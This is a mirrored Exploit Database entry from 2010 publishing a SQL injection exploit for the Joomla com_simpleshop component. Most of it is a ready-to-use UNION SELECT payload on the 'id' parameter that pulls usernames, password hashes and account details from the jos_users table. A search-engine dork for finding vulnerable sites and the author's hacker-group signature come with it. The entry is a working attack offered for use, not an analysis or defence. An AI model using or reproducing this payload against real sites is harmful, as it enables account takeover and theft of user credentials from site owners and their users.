Joomla! Component com_SimpleShop – SQL Injection

• Exploit Database
• 120 阅读

• 作者： UnD3rGr0unD W4rri0rZ
  日期： 2010-07-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14501/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40

  ============================================================== Joomla Component (com_simpleshop) SQL Injection Vulnerability ==============================================================   ########################### Title : Joomla Component (com_simpleshop) SQL Injection Vulnerability Script : Joomla Galore Simple Shop Date : 07/26/2010 Author : UnD3rGr0unD W4rri0rZ Vendor : http://galore.co.za/ Dork : inurl:"option=com_simpleshop" & inurl:"viewprod" ########################### [ Vulnerable File ] [path]/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=[SQL]   [SQL]:   id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--   Xpl index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--   ############################################################## #================================================== #{~} I am HeaDShoT(tunisian muslim hacker) From UnD3rGr0unD W4rri0rZ{~} # #cont@ct: #pwz@hotmail.Fr # #{~} there is always one who intelligent more than you do you should be optimistic{~} #================================================== #all greetZ to allah #& # my friends # M4MIM4N // L363ND //Meher Assel // Ghost_tn //ta3lab el maker // Th3 m3t4l-m4n # ##############################################################